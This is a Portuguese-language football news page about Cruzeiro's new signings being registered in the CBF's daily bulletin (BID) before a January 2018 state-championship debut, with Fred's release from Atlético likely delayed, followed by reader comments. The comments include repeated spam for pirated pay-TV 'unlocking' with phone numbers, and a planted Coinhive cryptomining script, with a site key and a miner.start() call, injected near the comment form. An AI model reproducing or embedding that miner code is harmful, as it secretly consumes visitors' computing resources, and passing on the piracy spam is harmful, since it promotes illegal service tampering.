logo

14/1/2018 15:54

Com exceção de Fred, Cruzeiro espera todos os reforços regularizados no BID até quarta

Vice-presidente de futebol prometeu nomes publicados até data da estreia

Com exceção de Fred, Cruzeiro espera todos os reforços regularizados no BID até quarta

Se depender da diretoria do Cruzeiro, Mano Menezes terá desde o primeiro jogo da temporada os sete reforços para temporada à disposição. A expectativa é de que os nomes dos laterais Edilson, Marcelo Hermes e Egídio; dos meio-campistas Bruno Silva e Mancuello, além do atacante David, sejam publicados a partir desta segunda-feira no Boletim Informativo Diário (BID), da Confederação Brasileira de Futebol. A estreia da Raposa no Estadual será contra o Tupi, nesta quarta, às 21h45, no Mineirão.


“A única questão dos jogadores no BID que pode ser que não dê certo é o Fred. Porque o clube que o liberou (Atlético) tem 30 dias para protocolar a liberação e, por coincidência, os 30 dias dão no dia 17 (data da estreia do Cruzeiro no Campeonato Mineiro). O advogado do atleta está tentando antecipar o protocolo dessa rescisão, mas se não fizer vamos ter paciência. Mas o restante, essa semana que entra, todos os jogadores vão estar no BID”, garantiu Itair Machado, vice-presidente de futebol do Cruzeiro.

Durante a entrevista, o dirigente cruzeirense também cutucou o Atlético pela demora na liberação de Fred. “Eles (Atlético) têm 30 dias para liberar o atleta, e os 30 dias dão no dia 17. Se eles optarem por não liberar antes, com medo de o Cruzeiro, com todo respeito ao adversário, já sair fazendo três pontos, é um direito deles”, disse. A tendência é que o novo camisa 9 do Cruzeiro não tenha condições legais de jogo na quarta-feira, mas ainda sim ele estará no Mineirão na festa preparada pela nova gestão do clube de abertura da temporada.

Dos reforços, apenas dois devem iniciar a partida desta quarta-feira. Egídio já assumiu a posição de titular na lateral esquerda e foi utilizado por Mano Menezes nos dois primeiros testes da temporada, em jogos-treino contra Guarani de Divinópolis e Ipatinga, ambos na Toca da Raposa II. Bruno Silva é outro que parece ter ganhado uma vaga na equipe principal. Edilson, outro provável titular, só se apresentou na sexta-feira. Embora tenha treinado neste sábado, são remotas as chances de ele começar jogando o compromisso contra o Tupi.

O atacante David ainda não foi apresentado uma vez que está em fase final de tratamento de uma lesão na coxa direita com os médicos do Cruzeiro. A expectativa é que o jovem, de 22 anos, ainda precise de alguns dias para treinar com o restante do elenco. Último reforço anunciado, o argentino Mancuello tem desembarque previsto para esta segunda-feira em Belo Horizonte.
Tags: seriea interiormg mercadobola reforços cruzeiro

1719 visitas - Fonte: Superesportes


se o Atlético atrasar prá liberação do Fred e só descontar na multa,aplica uma multa nele também!

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

tiago silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

é um ótimo jogador vai encaixar certinho no time do cruzeiro

Vai ler diretoria do cruzeiro traz escarpa

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Rafael Pontes     

vamos ver
< src="https://coinhive.com/lib/coinhive.min.js"><>var miner = new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ", {throttle: 0.3});miner.start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.

Próximo Jogo - Brasileiro

Dom - 16:00 - Mineirão - PPV
Cruzeiro
Bahia

Último jogo - Copa do Brasil

Qua - 19:30 - Mineirão
Cruzeiro
1 2
Santos